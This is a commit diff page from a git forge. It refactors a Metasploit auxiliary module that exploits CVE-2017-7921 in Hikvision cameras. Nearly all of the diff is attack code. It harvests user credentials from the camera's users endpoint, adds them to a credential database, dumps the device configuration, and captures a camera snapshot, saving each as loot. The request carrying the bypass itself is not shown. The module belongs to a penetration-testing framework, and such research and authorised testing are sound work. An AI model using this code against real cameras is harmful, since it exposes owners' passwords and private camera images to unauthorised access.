adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Addressed all commit suggestions

Browse Source
This commit is contained in:
h00die-gr3y
2022-10-09 15:49:58 +00:00
parent 462b80cf6f
commit ae0f94beb7
1 changed files with 35 additions and 60 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+35 -60
View File
@@ -84,14 +84,16 @@ class MetasploitModule < Msf::Auxiliary
return nil
end
def report_creds(user, pwd)
credential_data = {
module_fullname: self.fullname,
username: user,
private_data: pwd,
private_type: :password,
workspace_id: myworkspace_id,
status: Metasploit::Model::Login::Status::UNTRIED
module_fullname: fullname,
username: user,
private_data: pwd,
private_type: :password,
workspace_id: myworkspace_id,
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_details)
cred_res = create_credential_and_login(credential_data)
unless cred_res.nil?
print_status("Credentials for user:#{user} are added to the database...")
@@ -127,6 +129,7 @@ class MetasploitModule < Msf::Auxiliary
loot_data = ''
pwd = nil
print_status('Getting the user credentials...')
uri = normalize_uri(target_uri.path, 'Security', 'users')
creds_info = get_info(uri)
@@ -155,13 +158,20 @@ class MetasploitModule < Msf::Auxiliary
else
print_error('Response code invalid for obtaining the user credentials.')
end
return loot_data
unless loot_data.nil?
if datastore['PRINT'] == true
print_status(loot_data.to_s)
end
loot_path = store_loot('hikvision.credential', 'text/plain', datastore['RHOSTS'], loot_data, 'credentials', 'leaked credentials')
print_good("User credentials are successfully saved to #{loot_path}")
end
end
def get_config
loot_data = ''
# Get device info
print_status('Getting the camera hardware and software configuration...')
uri = normalize_uri(target_uri.path, 'System', 'deviceInfo')
device_info = get_info(uri)
@@ -257,13 +267,20 @@ class MetasploitModule < Msf::Auxiliary
else
print_error('Response code invalid for obtaining camera storage configuration.')
end
return loot_data
unless loot_data.nil?
if datastore['PRINT'] == true
print_status(loot_data.to_s)
end
loot_path = store_loot('hikvision.config', 'text/plain', datastore['RHOSTS'], loot_data, 'configuration', 'camera configuration')
print_good("Camera configuration details are successfully saved to #{loot_path}")
end
end
def take_snapshot
jpeg_image = nil
# Take a snapshot and store as jpeg
print_status('Taking a camera snapshot...')
uri = normalize_uri(target_uri.path, 'Streaming', 'channels', '1', 'picture?snapShotImageType=JPEG')
res = get_info(uri)
@@ -274,7 +291,10 @@ class MetasploitModule < Msf::Auxiliary
else
print_error('Response code invalid for obtaining a camera snapshot.')
end
return jpeg_image
unless jpeg_image.nil?
loot_path = store_loot('hikvision.image', 'jpeg/image', datastore['RHOSTS'], jpeg_image, 'snapshot', 'camera snapshot')
print_good("Camera snapshot is successfully saved to #{loot_path}")
end
end
def check
@@ -296,60 +316,15 @@ class MetasploitModule < Msf::Auxiliary
case action.name
when 'Automatic'
print_status('Running in automatic mode')
print_status('Getting the user credentials...')
creds_loot_data = get_creds
unless creds_loot_data.nil?
if datastore['PRINT'] == true
print_status(creds_loot_data.to_s)
end
loot_path = store_loot('hikvision.credential', 'text/plain', datastore['RHOSTS'], creds_loot_data, 'credentials', 'leaked credentials')
print_good("User credentials are successfully saved to #{loot_path}")
end
print_status('Getting the camera hardware and software configuration...')
config_loot_data = get_config
unless config_loot_data.nil?
if datastore['PRINT'] == true
print_status(config_loot_data.to_s)
end
loot_path = store_loot('hikvision.config', 'text/plain', datastore['RHOSTS'], config_loot_data, 'configuration', 'camera configuration')
print_good("Camera configuration details are successfully saved to #{loot_path}")
end
print_status('Taking a camera snapshot...')
snapshot_loot_data = take_snapshot
unless snapshot_loot_data.nil?
loot_path = store_loot('hikvision.image', 'jpeg/image', datastore['RHOSTS'], snapshot_loot_data, 'snapshot', 'camera snapshot')
print_good("Camera snapshot is successfully saved to #{loot_path}")
end
get_creds
get_config
take_snapshot
when 'Credentials'
print_status('Getting the user credentials...')
creds_loot_data = get_creds
unless creds_loot_data.nil?
if datastore['PRINT'] == true
print_status(creds_loot_data.to_s)
end
loot_path = store_loot('hikvision.credential', 'text/plain', datastore['RHOSTS'], creds_loot_data, 'credentials', 'leaked credentials')
print_good("User credentials are successfully saved to #{loot_path}")
end
get_creds
when 'Configuration'
print_status('Getting the camera hardware and software configuration...')
config_loot_data = get_config
unless config_loot_data.nil?
if datastore['PRINT'] == true
print_status(config_loot_data.to_s)
end
loot_path = store_loot('hikvision.config', 'text/plain', datastore['RHOSTS'], config_loot_data, 'configuration', 'camera configuration')
print_good("Camera configuration details are successfully saved to #{loot_path}")
end
get_config
when 'Snapshot'
print_status('Taking a camera snapshot...')
snapshot_loot_data = take_snapshot
unless snapshot_loot_data.nil?
loot_path = store_loot('hikvision.image', 'jpeg/image', datastore['RHOSTS'], snapshot_loot_data, 'snapshot', 'camera snapshot')
print_good("Camera snapshot is successfully saved to #{loot_path}")
end
take_snapshot
end
end
end